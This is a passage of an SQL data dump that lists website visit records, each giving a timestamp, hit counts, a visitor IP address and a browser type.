64.28','chrome'),(163952,1507189876,1,1,0,0,'51.255.71.115','other'),(163953,1507189986,1,1,0,0,'51.255.71.127','other'),(163954,1507190082,1,1,0,0,'8.29.198.26','other'),(163955,1507190096,1,1,0,0,'51.255.65.65','other'),(163956,1507190116,2,2,0,0,'178.95.66.130','firefox'),(163957,1507190286,1,1,0,0,'51.255.65.24','other'),(163958,1507190483,12,12,0,0,'69.30.198.242','other'),(163959,1507190741,1,1,0,0,'107.167.109.167','chrome'),(163960,1507190912,1,1,0,0,'37.52.19.237','chrome'),(163961,1507191043,2,0,2,0,'66.249.70.27',''),(163962,1507191341,1,1,0,0,'95.132.4.23','firefox'),(163963,1507191492,1,0,1,0,'66.249.70.29',''),(163964,1507191552,1,1,0,0,'51.255.65.55','other'),(163965,1507191745,1,1,0,0,'51.255.71.98','other'),(163966,1507191901,1,1,0,0,'217.182.132.190','other'),(163967,1507191920,1,1,0,0,'217.182.132.67','other'),(163968,1507191954,1,1,0,0,'188.32.244.86','msie'),(163969,1507192050,1,1,0,0,'51.255.65.86','other'),(163970,1507192490,1,1,0,0,'141.8.142.74','other'),(163971,1507193159,1,1,0,0,'217.182.132.94','other'),(163972,1507193175,1,1,0,0,'91.196.178.135','firefox'),(163973,1507193838,1,1,0,0,'51.255.65.4','other'),(163974,1507193877,2,2,0,0,'91.196.178.67','chrome'),(163975,1507194196,1,1,0,0,'217.69.133.194','other'),(163976,1507194612,1,1,0,0,'141.8.142.74','other'),(163977,1507194897,1,1,0,0,'51.255.65.45','other'),(163978,1507195029,1,1,0,0,'217.182.132.152','other'),(163979,1507195070,1,1,0,0,'51.255.65.54','other'),(163980,1507195833,1,1,0,0,'137.74.207.101','other'),(163981,1507196508,1,1,0,0,'91.196.177.46','firefox'),(163982,1507197155,1,1,0,0,'40.77.167.13','other'),(163983,1507197466,1,1,0,0,'217.69.133.4','other'),(163984,1507197468,1,1,0,0,'51.255.65.56','other'),(163985,1507197486,1,1,0,0,'217.69.133.5','other'),(163986,1507197659,1,1,0,0,'137.74.207.161','other'),(163987,1507199098,1,1,0,0,'141.8.142.74','other'),(163988,1507199133,1,1,0,0,'217.182.132.90','other'),(163989,1507199221,1,1,0,0,'217.69.133.4','other'),(163990,1507199305,1,1,0,0,'217.182.132.182','other'),(163991,1507199458,1,1,0,0,'51.255.65.11','other'),(163992,1507199459,1,1,0,0,'51.255.71.115','other'),(163993,1507199519,1,1,0,0,'91.209.11.236','other'),(163994,1507199746,1,1,0,0,'107.167.109.20','opera'),(163995,1507200210,1,1,0,0,'217.182.132.240','other'),(163996,1507200230,1,1,0,0,'217.69.133.194','other'),(163997,1507200253,1,1,0,0,'91.196.178.69','firefox'),(163998,1507200660,1,1,0,0,'51.255.65.94','other'),(163999,1507200803,1,1,0,0,'164.132.162.164','other'),(164000,1507200912,1,1,0,0,'8.29.198.27','other'),(164001,1507201260,1,0,1,0,'66.249.64.29',''),(164002,1507201267,1,0,1,0,'68.180.229.52',''),(164003,1507201553,1,1,0,0,'51.255.65.78','other'),(164004,1507201577,1,1,0,0,'91.209.11.236','other'),(164005,1507201614,1,1,0,0,'51.255.65.30','other'),(164006,1507201706,1,1,0,0,'91.196.178.129','chrome'),(164007,1507202430,1,0,1,0,'68.180.229.52',''),(164008,1507202650,1,1,0,0,'188.255.17.134','other'),(164009,1507202709,2,2,0,0,'178.154.171.88','other'),(164010,1507202776,1,1,0,0,'217.69.133.5','other'),(164011,1507202999,1,1,0,0,'51.255.65.58','other'),(164012,1507203014,1,1,0,0,'51.255.65.224','other'),(164013,1507203195,1,1,0,0,'107.167.109.20','opera'),(164014,1507203227,1,1,0,0,'195.5.38.31','chrome'),(164015,1507203401,1,0,1,0,'68.180.229.52',''),(164016,1507203532,1,1,0,0,'45.32.57.216','firefox'),(164017,1507203594,1,1,0,0,'91.209.11.236','other'),(164018,1507203799,1,1,0,0,'51.255.65.82','other'),(164019,1507204173,1,1,0,0,'91.124.45.120','chrome'),(164020,1507204462,1,0,1,0,'66.249.64.28',''),(164021,1507205220,1,1,0,0,'91.209.11.236','other'),(164022,1507205291,1,1,0,0,'178.154.171.88','other'),(164023,1507205344,1,1,0,0,'91.196.178.69','chrome'),(164024,1507206128,1,1,0,0,'107.167.107.152','opera'),(164025,1507206870,1,1,0,0,'91.219.253.99','chrome'),(164026,1507206918,1,1,0,0,'91.209.11.236','other'),(164027,1507206988,1,1,0,0,'91.196.178.67','chrome'),(164028,1507207315,1,0,1,0,'66.249.70.27',''),(164029,1507208315,1,1,0,0,'217.69.133.6','other'),(164030,1507208898,1,1,0,0,'217.69.133.3','other'),(164031,1507208938,3,3,0,0,'91.209.11.236','other'),(164032,1507209572,1,1,0,0,'91.196.178.69','chrome'),(164033,1507209870,1,1,0,0,'141.8.142.74','other'),(164034,1507209981,1,1,0,0,'216.244.66.237','other'),(164035,1507210329,1,1,0,0,'217.69.133.5','other'),(164036,1507210463,1,1,0,0,'91.209.11.236','other'),(164037,1507211005,1,1,0,0,'178.154.171.88','other'),(164038,1507211740,1,1,0,0,'8.29.198.27','other'),(164039,1507212036,1,1,0,0,'178.154.171.88','other'),(164040,1507212610,1,1,0,0,'157.55.39.89','other'),(164041,1507213134,1,1,0,0,'141.8.142.74','other'),(164042,1507215153,1,1,0,0,'141.8.142.74','other'),(164043,1507216815,1,1,0,0,'91.196.178.161','chrome'),(164044,1507217280,1,1,0,0,'91.196.178.136','chrome'),(164045,1507218350,1,0,1,0,'66.249.64.28',''),(164046,1507218441,1,1,0,0,'66.249.70.25','chrome'),(164047,1507218464,1,1,0,0,'66.249.64.30','chrome'),(164048,1507218487,1,0,1,0,'66.249.70.27',''),(164049,1507219301,1,1,0,0,'162.210.196.129','other'),(164050,1507219361,1,1,0,0,'178.154.171.88','other'),(164051,1507219836,1,1,0,0,'141.8.142.74','other'),(164052,1507220284,1,1,0,0,'66.249.70.25','chrome'),(164053,1507220864,1,1,0,0,'180.76.15.146','other'),(164054,1507221795,1,0,1,0,'66.249.70.29',''),(164055,1507222527,1,1,0,0,'180.76.15.158','other'),(164056,1507222569,1,1,0,0,'8.29.198.26','other'),(164057,1507224715,1,1,0,0,'40.77.167.13','other'),(164058,1507225881,1,0,1,0,'68.180.230.153',''),(164059,1507226158,1,1,0,0,'37.9.113.138','other'),(164060,1507226591,1,1,0,0,'217.69.133.4','other'),(164061,1507226695,1,1,0,0,'37.9.113.157','other'),(164062,1507227242,1,1,0,0,'95.133.13.34','chrome'),(164063,1507227275,1,1,0,0,'178.154.200.32','other'),(164064,1507228392,1,0,1,0,'66.249.64.29',''),(164065,1507228976,1,1,0,0,'130.180.216.92','chrome'),(164066,1507229033,1,1,0,0,'207.46.13.47','other'),(164067,1507231134,1,1,0,0,'37.9.113.182','other'),(164068,1507231248,1,1,0,0,'62.210.101.101','other'),(164069,1507231365,2,2,0,0,'62.210.103.31','other'),(164070,1507233397,1,1,0,0,'8.29.198.26','other'),(164071,1507233996,1,1,0,0,'91.209.11.236','other'),(164072,1507235200,1,1,0,0,'87.250.224.125','other'),(164073,1507235543,2,2,0,0,'91.209.11.236','other'),(164074,1507235544,1,1,0,0,'91.196.178.101','chrome'),(164075,1507235619,1,1,0,0,'178.154.200.7','other'),(164076,1507236140,1,1,0,0,'180.76.15.31','other'),(164077,1507236627,1,1,0,0,'178.154.171.10','other'),(164078,1507237304,1,1,0,0,'217.69.133.9','other'),(164079,1507237549,1,0,1,0,'66.249.64.28',''),(164080,1507238243,1,1,0,0,'141.8.142.29','other'),(164081,1507238285,1,0,1,0,'66.249.64.29',''),(164082,1507238647,5,5,0,0,'46.229.168.77','other'),(164083,1507238662,1,1,0,0,'46.229.168.70','other'),(164084,1507238680,8,8,0,0,'46.229.168.67','other'),(164085,1507238698,4,4,0,0,'46.229.168.80','other'),(164086,1507238735,3,3,0,0,'46.229.168.74','other'),(164087,1507238737,4,4,0,0,'46.229.168.69','other'),(164088,1507238766,6,6,0,0,'46.229.168.78','other'),(164089,1507238778,4,4,0,0,'46.229.168.65','other'),(164090,1507238868,6,6,0,0,'46.229.168.68','other'),(164091,1507238886,6,6,0,0,'46.229.168.76','other'),(164092,1507238911,3,3,0,0,'46.229.168.71','other'),(164093,1507238958,1,1,0,0,'91.209.11.236','other'),(164094,1507238979,6,6,0,0,'46.229.168.72','other'),(164095,1507238997,3,3,0,0,'46.229.168.79','other'),(164096,1507239060,2,2,0,0,'46.229.168.66','other'),(164097,1507239146,4,4,0,0,'46.229.168.73','other'),(164098,1507239474,6,6,0,0,'46.229.168.75','other'),(164099,1507239522,1,1,0,0,'54.165.59.7','other'),(164100,1507239639,4,4,0,0,'46.229.168.69','other'),(164101,1507239669,1,1,0,0,'94.180.199.23','msie'),(164102,1507239721,3,3,0,0,'46.229.168.77','other'),(164103,1507239790,1,1,0,0,'178.154.171.88','other'),(164104,1507239804,7,7,0,0,'46.229.168.74','other'),(164105,1507239823,5,5,0,0,'46.229.168.68','other'),(164106,1507239897,4,4,0,0,'46.229.168.76','other'),(164107,1507239916,6,6,0,0,'46.229.168.71','other'),(164108,1507239935,4,4,0,0,'46.229.168.79','other'),(164109,1507240027,3,3,0,0,'46.229.168.72','other'),(164110,1507240065,3,3,0,0,'46.229.168.65','other'),(164111,1507240165,3,3,0,0,'46.229.168.70','other'),(164112,1507240225,7,7,0,0,'46.229.168.67','other'),(164113,1507240331,3,3,0,0,'46.229.168.78','other'),(164114,1507240341,4,4,0,0,'46.229.168.73','other'),(164115,1507240390,1,1,0,0,'213.180.203.40','other'),(164116,1507240431,3,3,0,0,'46.229.168.66','other'),(164117,1507240435,3,3,0,0,'46.229.168.75','other'),(164118,1507240489,1,1,0,0,'95.220.126.250','chrome'),(164119,1507240715,5,5,0,0,'46.229.168.74','other'),(164120,1507240716,1,0,1,0,'66.249.64.30',''),(164121,1507240750,4,4,0,0,'46.229.168.69','other'),(164122,1507240754,1,1,0,0,'66.249.64.30','chrome'),(164123,1507240763,1,1,0,0,'66.249.70.29','chrome'),(164124,1507240772,1,0,1,0,'66.249.70.25',''),(164125,1507240806,6,6,0,0,'46.229.168.80','other'),(164126,1507240842,4,4,0,0,'46.229.168.71','other'),(164127,1507240935,1,1,0,0,'46.229.168.79','other'),(164128,1507241045,7,7,0,0,'46.229.168.72','other'),(164129,1507241081,4,4,0,0,'46.229.168.65','other'),(164130,1507241085,1,1,0,0,'51.15.46.174','opera'),(164131,1507241166,7,7,0,0,'46.229.168.76','other'),(164132,1507241242,4,4,0,0,'46.229.168.78','other'),(164133,1507241285,2,2,0,0,'46.229.168.67','other'),(164134,1507241303,6,6,0,0,'46.229.168.68','other'),(164135,1507241370,2,2,0,0,'46.229.168.77','other'),(164136,1507241377,2,2,0,0,'46.229.168.73','other'),(164137,1507241487,3,3,0,0,'46.229.168.70','other'),(164138,1507241579,2,2,0,0,'46.229.168.75','other'),(164139,1507241609,2,2,0,0,'46.229.168.66','other'),(164140,1507241635,3,3,0,0,'46.229.168.74','other'),(164141,1507241746,2,2,0,0,'46.229.168.80','other'),(164142,1507241754,1,1,0,0,'91.209.11.236','other'),(164143,1507241764,2,2,0,0,'46.229.168.69','other'),(164144,1507241783,2,2,0,0,'46.229.168.71','other'),(164145,1507241948,3,3,0,0,'46.229.168.79','other'),(164146,1507242151,1,1,0,0,'46.229.168.76','other'),(164147,1507242198,1,1,0,0,'66.249.64.28','chrome'),(164148,1507244231,1,1,0,0,'8.29.198.27','other'),(164149,1507244980,1,0,1,0,'66.249.64.28',''),(164150,1507245433,1,1,0,0,'66.249.64.29','chrome'),(164151,1507245564,1,1,0,0,'217.69.133.6','other'),(164152,1507245827,1,1,0,0,'91.209.11.236','other'),(164153,1507246575,1,1,0,0,'216.244.66.237','other'),(164154,1507246723,1,1,0,0,'5.45.207.49','other'),(164155,1507246747,1,1,0,0,'207.46.13.47','other'),(164156,1507248208,1,1,0,0,'141.8.142.29','other'),(164157,1507248214,1,1,0,0,'217.69.133.194','other'),(164158,1507248547,38,38,0,0,'37.17.172.122','firefox'),(164159,1507249457,11,11,0,0,'37.17.172.122','firefox'),(164160,1507250219,1,1,0,0,'66.249.64.30','chrome'),(164161,1507250387,1,1,0,0,'217.69.133.9','other'),(164162,1507251240,1,0,1,0,'66.249.64.29',''),(164163,1507251371,1,1,0,0,'37.9.113.182','other'),(164164,1507251497,1,1,0,0,'217.69.133.6','other'),(164165,1507252434,1,1,0,0,'87.250.224.46','other'),(164166,1507252589,1,0,1,0,'68.180.229.52',''),(164167,1507253409,1,0,1,0,'66.249.70.25',''),(164168,1507253488,1,1,0,0,'69.30.234.2','other'),(164169,1507253879,2,2,0,0,'195.154.230.226','other'),(164170,1507254322,1,1,0,0,'217.69.133.194','other'),(164171,1507254518,1,1,0,0,'217.69.133.203','other'),(164172,1507254606,1,1,0,0,'91.209.11.236','other'),(164173,1507255070,1,1,0,0,'8.29.198.26','other'),(164174,1507255338,1,1,0,0,'217.69.133.5','other'),(164175,1507255403,1,1,0,0,'207.46.13.47','other'),(164176,1507255520,1,1,0,0,'217.69.133.4','other'),(164177,1507256548,1,1,0,0,'217.69.133.3','other'),(164178,1507259647,1,1,0,0,'217.69.133.3','other'),(164179,1507260708,1,1,0,0,'216.244.66.237','other'),(164180,1507260830,1,0,1,0,'66.249.70.27',''),(164181,1507261075,1,1,0,0,'217.69.133.6','other'),(164182,1507261308,1,1,0,0,'178.154.171.4','other'),(164183,1507261747,1,1,0,0,'217.69.133.4','other'),(164184,1507262613,1,1,0,0,'91.209.11.236','other'),(164185,1507263047,1,0,1,0,'66.249.70.27',''),(164186,1507263247,1,1,0,0,'204.12.206.18','firefox'),(164187,1507263410,1,0,1,0,'66.249.70.25',''),(164188,1507263669,1,1,0,0,'141.8.142.74','other'),(164189,1507265600,1,1,0,0,'178.154.171.88','other'),(164190,1507265604,1,1,0,0,'141.8.142.74','other'),(164191,1507265913,1,1,0,0,'8.29.198.27','other'),(164192,1507266007,1,0,1,0,'68.180.229.52',''),(164193,1507266710,1,1,0,0,'217.69.133.3','other'),(164194,1507267344,1,1,0,0,'141.8.142.74','other'),(164195,1507268111,1,1,0,0,'178.154.171.60','other'),(164196,1507268603,1,1,0,0,'141.8.142.74','other'),(164197,1507268748,1,1,0,0,'207.46.13.47','other'),(164198,1507269082,1,1,0,0,'91.196.178.68','chrome'),(164199,1507269092,1,1,0,0,'66.249.70.29','chrome'),(164200,1507270072,1,0,1,0,'68.180.229.52',''),(164201,1507270342,1,1,0,0,'91.196.179.138','chrome'),(164202,1507270345,1,0,1,0,'66.249.70.27',''),(164203,1507270614,1,1,0,0,'66.249.70.29','chrome'),(164204,1507271228,1,1,0,0,'107.167.104.176','opera'),(164205,1507271458,1,1,0,0,'91.196.178.71','chrome'),(164206,1507271597,1,1,0,0,'217.69.133.9','other'),(164207,1507271759,1,1,0,0,'66.249.64.28','chrome'),(164208,1507272717,1,1,0,0,'207.46.13.47','other'),(164209,1507272768,1,1,0,0,'91.196.179.25','chrome'),(164210,1507273340,1,1,0,0,'217.69.133.9','other'),(164211,1507273765,1,1,0,0,'91.196.179.138','chrome'),(164212,1507274305,1,1,0,0,'91.196.178.34','other'),(164213,1507274388,1,1,0,0,'66.249.64.29','chrome'),(164214,1507275124,1,1,0,0,'46.223.113.216','chrome'),(164215,1507275353,1,1,0,0,'91.209.11.236','other'),(164216,1507275526,1,1,0,0,'40.77.167.13','other'),(164217,1507276141,2,2,0,0,'91.196.178.71','chrome'),(164218,1507276750,1,1,0,0,'8.29.198.26','other'),(164219,1507276816,1,0,1,0,'66.249.64.28',''),(164220,1507276843,1,0,1,0,'66.249.64.29',''),(164221,1507277542,1,1,0,0,'185.137.18.170','chrome'),(164222,1507277569,1,1,0,0,'91.196.178.71','chrome'),(164223,1507278275,1,0,1,0,'68.180.230.153',''),(164224,1507278687,1,1,0,0,'87.250.224.85','other'),(164225,1507278928,1,1,0,0,'91.196.178.71','chrome'),(164226,1507279434,1,1,0,0,'87.250.224.46','other'),(164227,1507281081,83,83,0,0,'52.18.43.150','other'),(164228,1507281258,11,11,0,0,'91.209.51.22','other'),(164229,1507281357,1,1,0,0,'37.9.113.132','other'),(164230,1507281434,1,1,0,0,'77.222.134.100','firefox'),(164231,1507281806,1,1,0,0,'5.45.207.58','other'),(164232,1507282479,1,1,0,0,'91.196.179.138','chrome'),(164233,1507282575,1,1,0,0,'180.76.15.143','other'),(164234,1507282935,1,1,0,0,'46.242.79.96','msie'),(164235,1507282940,1,1,0,0,'91.196.178.65','chrome'),(164236,1507283326,1,1,0,0,'91.196.178.67','chrome'),(164237,1507283738,1,0,1,0,'66.249.70.27',''),(164238,1507284260,2,2,0,0,'213.108.45.138','chrome'),(164239,1507284328,1,1,0,0,'216.244.66.237','other'),(164240,1507284812,1,1,0,0,'178.154.200.28','other'),(164241,1507285068,1,1,0,0,'217.69.133.4','other'),(164242,1507285185,38,38,0,0,'52.18.43.150','other'),(164243,1507285293,1,1,0,0,'217.69.133.9','other'),(164244,1507286032,1,1,0,0,'91.196.178.129','firefox'),(164245,1507287580,1,1,0,0,'8.29.198.27','other'),(164246,1507288369,1,0,1,0,'66.249.64.29',''),(164247,1507288651,1,1,0,0,'91.196.177.129','firefox'),(164248,1507290175,1,1,0,0,'92.113.17.42','chrome'),(164249,1507290830,1,1,0,0,'185.3.35.152','msie'),(164250,1507290832,1,1,0,0,'185.3.35.152','chrome'),(164251,1507290899,2,2,0,0,'37.9.113.207','other'),(164252,1507290926,1,1,0,0,'87.250.224.125','other'),(164253,1507290929,1,1,0,0,'5.45.207.69','other'),(164254,1507290933,1,1,0,0,'95.108.181.111','other'),(164255,1507290937,1,1,0,0,'95.108.181.102','other'),(164256,1507290941,2,2,0,0,'5.45.207.58','other'),(164257,1507290945,1,1,0,0,'178.154.171.81','other'),(164258,1507290948,1,1,0,0,'87.250.224.77','other'),(164259,1507290952,1,1,0,0,'213.180.203.7','other'),(164260,1507290956,1,1,0,0,'37.9.113.80','other'),(164261,1507291503,1,0,1,0,'66.249.70.27',''),(164262,1507292054,1,1,0,0,'91.196.178.68','chrome'),(164263,1507292485,1,1,0,0,'213.180.203.40','other'),(164264,1507292696,1,1,0,0,'66.102.9.25','chrome'),(164265,1507292873,1,1,0,0,'37.9.113.82','other'),(164266,1507293759,1,1,0,0,'199.58.86.211','other'),(164267,1507293884,1,1,0,0,'66.249.70.27','chrome'),(164268,1507294202,1,0,1,0,'66.249.64.30',''),(164269,1507294245,1,1,0,0,'93.73.120.107','chrome'),(164270,1507294336,1,1,0,0,'93.78.21.125','chrome'),(164271,1507294874,1,0,1,0,'66.249.64.28',''),(164272,1507296084,1,1,0,0,'178.92.8.141','firefox'),(164273,1507296137,1,0,1,0,'66.249.64.28',''),(164274,1507296479,1,1,0,0,'217.69.133.5','other'),(164275,1507296804,1,1,0,0,'178.154.171.88','other'),(164276,1507297327,1,0,1,0,'66.249.70.29',''),(164277,1507297690,1,0,1,0,'66.249.70.27',''),(164278,1507298412,1,1,0,0,'8.29.198.27','other'),(164279,1507298656,1,1,0,0,'91.196.178.165','chrome'),(164280,1507298935,1,1,0,0,'178.154.171.88','other'),(164281,1507299791,1,1,0,0,'217.69.133.3','other'),(164282,1507300692,1,1,0,0,'87.250.224.46','other'),(164283,1507300806,1,1,0,0,'217.69.133.2','other'),(164284,1507301615,1,1,0,0,'207.46.13.47','other'),(164285,1507301828,1,1,0,0,'87.250.224.46','other'),(164286,1507302209,1,1,0,0,'91.196.178.36','chrome'),(164287,1507302544,1,1,0,0,'91.196.178.67','firefox'),(164288,1507303108,1,1,0,0,'40.77.167.13','other'),(164289,1507303305,1,0,1,0,'66.249.64.30',''),(164290,1507304413,1,1,0,0,'180.76.15.135','other'),(164291,1507304430,1,1,0,0,'195.12.59.16','chrome'),(164292,1507304578,1,0,1,0,'66.249.64.30',''),(164293,1507305405,1,1,0,0,'178.154.171.88','other'),(164294,1507305415,1,1,0,0,'87.250.224.46','other'),(164295,1507305425,1,1,0,0,'46.211.102.152','other'),(164296,1507305584,1,1,0,0,'93.183.228.6','chrome'),(164297,1507305623,1,1,0,0,'138.68.99.134','other'),(164298,1507306512,1,0,1,0,'66.249.64.28',''),(164299,1507306549,1,0,1,0,'66.249.64.29',''),(164300,1507308573,1,1,0,0,'178.154.171.88','other'),(164301,1507309247,1,1,0,0,'8.29.198.26','other'),(164302,1507312495,1,1,0,0,'141.8.142.74','other'),(164303,1507312725,1,1,0,0,'217.69.133.203','other'),(164304,1507313195,1,0,1,0,'66.249.64.15',''),(164305,1507313311,1,1,0,0,'91.209.11.236','other'),(164306,1507313601,1,1,0,0,'145.255.2.227','chrome'),(164307,1507313723,1,1,0,0,'217.69.133.203','other'),(164308,1507313935,1,1,0,0,'217.69.133.9','other'),(164309,1507314145,2,2,0,0,'95.213.141.124','opera'),(164310,1507314326,2,2,0,0,'95.213.141.126','opera'),(164311,1507315079,1,1,0,0,'216.244.66.237','other'),(164312,1507315449,2,2,0,0,'40.77.167.16','other'),(164313,1507315616,1,1,0,0,'87.250.224.46','other'),(164314,1507316839,1,1,0,0,'217.69.133.3','other'),(164315,1507317226,1,1,0,0,'217.69.133.5','other'),(164316,1507317631,1,1,0,0,'37.73.248.195','chrome'),(164317,1507318794,1,0,1,0,'66.249.64.29',''),(164318,1507319770,1,1,0,0,'91.209.11.236','other'),(164319,1507320080,1,1,0,0,'8.29.198.26','other'),(164320,1507321301,1,0,1,0,'66.249.64.29',''),(164321,1507321635,1,1,0,0,'91.209.11.236','other'),(164322,1507321788,1,1,0,0,'40.77.167.40','other'),(164323,1507323781,1,1,0,0,'91.196.178.72','chrome'),(164324,1507323811,1,1,0,0,'217.69.133.203','other'),(164325,1507323857,1,1,0,0,'217.69.133.4','other'),(164326,1507323960,1,1,0,0,'216.244.66.237','other'),(164327,1507324484,2,2,0,0,'208.80.155.142','other'),(164328,1507325182,1,1,0,0,'91.209.11.236','other'),(164329,1507325390,1,1,0,0,'207.46.13.47','other'),(164330,1507326937,2,2,0,0,'91.209.11.236','other'),(164331,1507328091,1,1,0,0,'216.244.66.237','other'),(164332,1507328439,1,1,0,0,'91.209.11.236','other'),(164333,1507329550,1,1,0,0,'217.69.133.3','other'),(164334,1507329838,1,1,0,0,'217.69.133.203','other'),(164335,1507330106,2,2,0,0,'217.69.133.9','other'),(164336,1507330580,5,5,0,0,'162.210.196.129','other'),(164337,1507330789,1,1,0,0,'136.243.73.76','other'),(164338,1507330906,1,1,0,0,'8.29.198.26','other'),(164339,1507331028,1,1,0,0,'178.154.171.88','other'),(164340,1507332541,1,1,0,0,'40.77.167.13','other'),(164341,1507333052,2,2,0,0,'141.8.142.74','other'),(164342,1507335467,1,1,0,0,'217.69.133.4','other'),(164343,1507336231,1,1,0,0,'217.69.133.5','other'),(164344,1507336410,1,1,0,0,'87.250.224.46','other'),(164345,1507337135,1,1,0,0,'217.69.133.9','other'),(164346,1507337640,1,1,0,0,'91.209.11.236','other'),(164347,1507337948,1,1,0,0,'66.249.70.27','chrome'),(164348,1507339111,3,3,0,0,'46.229.168.73','other'),(164349,1507339131,5,5,0,0,'46.229.168.68','other'),(164350,1507339149,1,1,0,0,'46.229.168.74','other'),(164351,1507339192,5,5,0,0,'46.229.168.66','other'),(164352,1507339203,4,4,0,0,'46.229.168.69','other'),(164353,1507339221,9,9,0,0,'46.229.168.79','other'),(164354,1507339258,8,8,0,0,'46.229.168.72','other'),(164355,1507339348,3,3,0,0,'46.229.168.70','other'),(164356,1507339387,3,3,0,0,'46.229.168.75','other'),(164357,1507339423,7,7,0,0,'46.229.168.71','other'),(164358,1507339533,5,5,0,0,'46.229.168.65','other'),(164359,1507339704,3,3,0,0,'46.229.168.77','other'),(164360,1507339718,1,1,0,0,'46.229.168.67','other'),(164361,1507339870,2,2,0,0,'46.229.168.76','other'),(164362,1507340007,2,2,0,0,'46.229.168.78','other'),(164363,1507340008,3,3,0,0,'46.229.168.80','other'),(164364,1507340082,6,6,0,0,'46.229.168.73','other'),(164365,1507340247,2,2,0,0,'46.229.168.72','other'),(164366,1507340263,4,4,0,0,'46.229.168.70','other'),(164367,1507340283,6,6,0,0,'46.229.168.79','other'),(164368,1507340336,5,5,0,0,'46.229.168.68','other'),(164369,1507340391,5,5,0,0,'46.229.168.75','other'),(164370,1507340427,5,5,0,0,'46.229.168.71','other'),(164371,1507340471,4,4,0,0,'46.229.168.65','other'),(164372,1507340490,5,5,0,0,'46.229.168.74','other'),(164373,1507340786,1,1,0,0,'46.229.168.77','other'),(164374,1507340821,1,1,0,0,'87.250.224.46','other'),(164375,1507340875,2,2,0,0,'46.229.168.69','other'),(164376,1507340948,2,2,0,0,'46.229.168.76','other'),(164377,1507340966,2,2,0,0,'46.229.168.67','other'),(164378,1507341078,3,3,0,0,'46.229.168.73','other'),(164379,1507341114,1,1,0,0,'217.69.133.6','other'),(164380,1507341212,2,2,0,0,'46.229.168.72','other'),(164381,1507341310,2,2,0,0,'141.8.142.74','other'),(164382,1507341360,2,2,0,0,'141.8.132.19','other'),(164383,1507341734,1,1,0,0,'8.29.198.26','other'),(164384,1507341785,1,1,0,0,'81.1.242.33','other'),(164385,1507342262,1,1,0,0,'87.250.224.46','other'),(164386,1507343151,1,1,0,0,'180.76.15.25','other'),(164387,1507343353,3,3,0,0,'141.8.142.74','other'),(164388,1507343872,1,0,1,0,'66.249.64.29',''),(164389,1507343889,2,2,0,0,'87.250.224.46','other'),(164390,1507343902,1,0,1,0,'66.249.64.30',''),(164391,1507344490,2,2,0,0,'178.154.171.88','other'),(164392,1507345019,1,1,0,0,'180.76.15.16','other'),(164393,1507345343,1,1,0,0,'217.69.133.5','other'),(164394,1507345743,1,1,0,0,'91.209.11.236','other'),(164395,1507346201,2,2,0,0,'178.154.171.88','other'),(164396,1507346735,1,1,0,0,'141.8.142.74','other'),(164397,1507346914,1,1,0,0,'37.9.113.115','other'),(164398,1507347359,1,1,0,0,'87.250.224.46','other'),(164399,1507347367,2,2,0,0,'178.154.171.88','other'),(164400,1507348235,2,2,0,0,'141.8.142.74','other'),(164401,1507349442,2,2,0,0,'87.250.224.46','other'),(164402,1507349611,1,1,0,0,'178.154.171.88','other'),(164403,1507350045,1,1,0,0,'141.8.142.74','other'),(164404,1507350728,1,1,0,0,'40.77.167.40','other'),(164405,1507351358,1,1,0,0,'87.250.224.46','other'),(164406,1507352434,1,1,0,0,'178.154.171.88','other'),(164407,1507352569,1,1,0,0,'8.29.198.25','other'),(164408,1507352949,1,1,0,0,'141.8.142.74','other'),(164409,1507353229,1,0,1,0,'66.249.64.30',''),(164410,1507353413,1,1,0,0,'91.121.86.136','other'),(164411,1507354119,1,1,0,0,'178.154.171.88','other'),(164412,1507354328,2,2,0,0,'141.8.142.74','other'),(164413,1507354834,1,1,0,0,'141.8.132.19','other'),(164414,1507355134,1,1,0,0,'87.250.224.46','other'),(164415,1507355767,1,1,0,0,'91.209.11.236','other'),(164416,1507356370,2,2,0,0,'178.154.171.88','other'),(164417,1507356722,1,1,0,0,'141.8.142.74','other'),(164418,1507356727,1,1,0,0,'37.9.113.182','other'),(164419,1507357244,1,0,1,0,'66.249.70.25',''),(164420,1507357252,1,1,0,0,'66.249.70.25','chrome'),(164421,1507357270,1,1,0,0,'66.249.64.29','chrome'),(164422,1507358010,1,1,0,0,'141.8.132.19','other'),(164423,1507358268,1,1,0,0,'217.69.133.194','other'),(164424,1507358369,1,1,0,0,'141.8.142.74','other'),(164425,1507358909,2,2,0,0,'178.154.171.88','other'),(164426,1507358916,2,2,0,0,'91.209.11.236','other'),(164427,1507359362,2,2,0,0,'87.250.224.46','other'),(164428,1507359605,1,1,0,0,'141.8.142.74','other'),(164429,1507360214,1,1,0,0,'178.255.41.252','firefox'),(164430,1507360610,1,1,0,0,'207.241.231.35','other'),(164431,1507361789,2,2,0,0,'141.8.142.74','other'),(164432,1507362813,1,1,0,0,'180.76.15.137','other'),(164433,1507362883,3,3,0,0,'141.8.142.74','other'),(164434,1507362927,1,1,0,0,'91.242.40.187','msie'),(164435,1507363332,2,2,0,0,'178.154.171.88','other'),(164436,1507363401,1,1,0,0,'8.29.198.26','other'),(164437,1507363668,1,0,1,0,'66.249.64.30',''),(164438,1507363953,1,1,0,0,'37.9.113.182','other'),(164439,1507364863,1,1,0,0,'141.8.142.74','other'),(164440,1507364880,1,1,0,0,'91.209.11.236','other'),(164441,1507365932,2,0,2,0,'66.249.64.29',''),(164442,1507366219,1,1,0,0,'91.196.178.161','chrome'),(164443,1507366231,1,1,0,0,'178.154.171.88','other'),(164444,1507366431,1,1,0,0,'40.77.167.13','other'),(164445,1507366474,1,1,0,0,'141.8.132.19','other'),(164446,1507366484,1,1,0,0,'178.154.171.55','other'),(164447,1507366756,1,1,0,0,'91.209.11.236','other'),(164448,1507366787,1,1,0,0,'216.244.66.237','other'),(164449,1507366837,1,1,0,0,'95.132.45.118','firefox'),(164450,1507366889,1,1,0,0,'87.250.224.46','other'),(164451,1507367027,1,1,0,0,'207.46.13.47','other'),(164452,1507367649,1,1,0,0,'141.8.142.74','other'),(164453,1507368220,2,0,2,0,'66.249.64.30',''),(164454,1507368256,1,1,0,0,'54.165.59.7','other'),(164455,1507368302,2,2,0,0,'178.154.171.88','other'),(164456,1507369542,1,1,0,0,'37.9.113.182','other'),(164457,1507369866,1,1,0,0,'91.209.11.236','other'),(164458,1507370097,2,2,0,0,'87.250.224.46','other'),(164459,1507370623,1,1,0,0,'141.8.142.74','other'),(164460,1507370699,3,3,0,0,'178.154.171.88','other'),(164461,1507371391,1,1,0,0,'180.76.15.150','other'),(164462,1507371818,1,1,0,0,'178.154.171.88','other'),(164463,1507372336,1,1,0,0,'40.77.167.13','other'),(164464,1507373454,1,1,0,0,'207.46.13.82','other'),(164